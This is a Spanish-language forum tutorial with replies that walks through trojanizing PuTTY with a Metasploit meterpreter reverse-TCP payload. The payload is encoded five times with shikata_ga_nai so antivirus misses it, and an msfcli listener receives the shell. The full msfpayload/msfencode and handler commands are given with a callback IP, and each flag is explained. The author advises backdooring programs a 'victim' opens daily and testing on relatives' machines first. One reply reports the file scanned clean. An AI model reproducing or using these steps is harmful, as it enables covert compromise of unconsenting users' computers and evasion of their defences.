+Temario
-+Introduccion
-+Seleccionando ejecutable
-+¿Backdorizando?
-+¿msfpayload?
-+Analizando msfpayload
-+¿Listener?
-+¿Msfcli?
-+Lazando listener
-+Analziando listener
-+Conclucion
+Introduccion
  • Bueno ya emos visto como penetrar una maquina remota
    pero que pasa si no tiene vulnerabilidades???
    Bueno como dije en la lectura obligatoria, hay veces que
    tenemos que "forzar" el asun jejejeje y esta vez les voy a
    eneseñar como poner un revers shell en un (.EXE)
    en pocas palabras vamos a poner un backdoor en cualquier
    ejecutable que nosotro queramos

    Bueno en mi casa infectare el putty con un rever shell meterpreter
    y lo encodearmos con shikata_ga_nai que es tipica jejeje
+Seleccionando ejecutable
  • Bueno aqui los amigos de metasploit fueron brillantemente sencillos
    y nos facilitaron la tarea podiendo backdorizar cualqueri cosa que
    queramos en mi caso usar putty ustedes pueden ustilizar lo que
    quiera y les recomiendo algo que sepan que la victima abre diario
    como msn, iexplorer, firefox u lo que sea.

+¿Backdorizando?

  • Ok lo primero que vamos a hacer es colocarnos en la caperta donde
    renemos nuestro metasploit guardado y vamos a a consola

Código: Seleccionar todo

shiva-sheva@cracker:~$ cd metasploit
shiva-sheva@cracker:~/metasploit$ ls
1              HACKING  msfconsole  msfgui       msfpescan  plugins  tools
data           lib      msfd        msfmachscan  msfrpc     README
documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
external       msfcli   msfencode   msfpayload   msfweb     test
shiva-sheva@cracker:~/metasploit$ 
  • En mi caso es asi no se ustedes donde la tenga

+¿msfpayload?

  • Bueno este es el que usaremos para backdorizar
    y veamos como se hace esto y despues lo analizamos!

Código: Seleccionar todo

shiva-sheva@cracker:~/metasploit$ su
Password: 

root@cracker:/home/shiva-sheva/metasploit# ./msfpayload windows/meterpreter/reverse_tcp LHOST=201.137.195.203 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_bd.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)

root@cracker:/home/shiva-sheva/metasploit# 


+Analizando msfpayload

  • Primero me logie con su para tener permisos de root
    Despues
    ./msfpayload: Lo llamamos
    windows/meterpreter/reverse_tcp: Indicamos la direcion del rever shell
    LHOST=201.137.195.203 : Ojo aqui el el local host pongan sus ip's pubicas
    LPORT=8080 R: Indicamosel puerto porle cual conectara
    | : Separamos
    ./msfencode: Lo llamamos este sirve para "encryptar" para que entiendan jeje
    -t exe: Indicamso que es un exe
    -x /tmp/putty.exe: Hubicacion del archivo
    -o /tmp/putty_bd.exe: Hubicacion donde se guardara y el nombre con el que se guardara
    -e x86/shikata_ga_nai: Metodo de codificacion y su ruta
    -c 5: Numero de veces a encodificar para que quede FUD!

    Interesante no? ....
+¿Listener?
  • Bueno ya hicimos una parte que es backdorizar un .EXE
    ahora tenemos que poner algo que escuche la conexion
    cuando ejecuten ese backdoor no???
    Bueno para esto sirve el listener
+¿Msfcli?
  • Bueno bueno no se rompan la cabeza no es tan complicado
    metasploit nos ofrece como ya lo e dicho una alta gama
    de jugetes muy divertidos en este caso usaremos msfcli
    para lanzar nuestro listener.
+Lazando listener

Código: Seleccionar todo

root@cracker:/home/shiva-sheva/metasploit# ./msfcli exploit/multi/handler payloader=shikata_ga_nai LHOST=201.137.195.203 LPORT=8080 payload=windows/meterpreter/reverse_tcp E
[*] Please wait while we load the module tree...
[-] Handler failed to bind to 201.137.195.203:8080
[*] Started reverse handler on 0.0.0.0:8080 
[*] Starting the payload handler...


+Analziando listener

  • Tenemos que ser muy especificos en esto por que si ponemos algo mal no va a conectar
    mucho cuidado con la ortografia y recuerden poner lo mismo que pusieron en msfcli
    les recoemidno de nuevo practicar con una maquina que tengan en red de su mama
    hermana o hermano papa lo que sea pero en red es mas sencillo y despues ya se
    pasan con una victima de otra parte!
  • Bueno
    ./msfcli: Lo llamamos
    exploit/multi/handler: Ruta del exploit
    payloader=shikata_ga_nai: indicamos el payloader
    LHOST=201.137.195.203 : Su ip
    LPORT=8080 : El puerto
    payload=windows/meterpreter/reverse_tcp E: Indicamos el payload
+Conclusion
  • Y bueno en est aparte quiero dar una gran gran parte de los creditos
    a este ProcessKill que sin el no hubira podido hacer la pruebas del
    backdoor y me hubiera tardado mas en postear Gracias amigo
    Esperan la parte VI
¡En el pen-testing el eslabon mas debil es el usuario!
Gracias shiva. Esperaba otro tipo de pentesting pero aun asi esta bien. Estos temas ya los conocia del msf. Sin embargo como en todos los tutos de la red te centras en el fallo del smb que está ya muy muy parcheado... el ms06... con el autopwn si te das cuenta es lo que te da la shell... las dos.

En este tema de backdoorizar realmente queda fud??
Un saludo y enhorabuena.

Código: Seleccionar todo

LHOST=201.137.195.203 : Ojo aqui el el local host pongan sus ip's pubicas 
y si la ip es privada? se utiliza igual

P.D gracias por los tutos
http://osx-soft.blogspot.com
osx escribió:

Código: Seleccionar todo

LHOST=201.137.195.203 : Ojo aqui el el local host pongan sus ip's pubicas 
y si la ip es privada? se utiliza igual

P.D gracias por los tutos
La IP privada se utiliza para probar dentro de tu area local, tu ip publica se utiliza para PC's remotos (Fuera de tu red Local)
Espero que te sirva! :)
Imagen
osx no entendi como que si la ip privada? se utiliza igual??
como osea
hay pones la ip tuya ya se que estes pentesteando en red local o con una victima en china
si es tu red local pones tu ip local
y si es con la victima de china pones tu ip publica
¡En el pen-testing el eslabon mas debil es el usuario!
illera88 escribió:si lo encodeas x veces queda realmente fud???
Si, queda realmente FUD.. Acabo de realizar el metodo con 3 archivos .exe distintios (No necesariamente tienen que ser servers, cualquier programa sirve) y lo subí a NVT dió un resultado CLEAN

Saludos!
Imagen
Una pregunta si al ejecutar autopwn me arroja lo siguiente:

[*] The autopwn command has completed with 0 sessions

o sea significa que no detecto ninguna vulnerabilidad ya sea es sistemas unix o windows. Qué otras herramientas me podrían ayudar para detectar alguna otra vulnerabilidad si aún no he podido conseguir una shell del sistema operativo que estoy testeando.

El sistema operativo a testear es ubuntu server, gracias por toda la información y tiempo que dedican para realizar estos manuales.



Otro poco de información es que encuentro los siguientes puertos abiertos dentro de la red LAN

21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open https
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
8080/tcp open http-proxy
8081/tcp open blackice-icecap

gracias de nuevo
Ok como dije aveces hay que forzar las cosas un poco el autopwn es muy poco efectivo pero tambien es util conozerlo si lees mas adelante podras ver unas tecnicas para infectar con un payload binario etc... y asi podras lograr penetrar en el sistema haymuchos metodos muchos escaners exploits dentro de msf o en internet si consiges informacion de que S.O. podras buscar mas acertadamente algo para eso y si sabes que navegador usa y asi recopilando la mayor cantidad de informacion podras obtener mas posibilidades para saber que puedes explotar saludos!
¡En el pen-testing el eslabon mas debil es el usuario!
Responder

Volver a “General”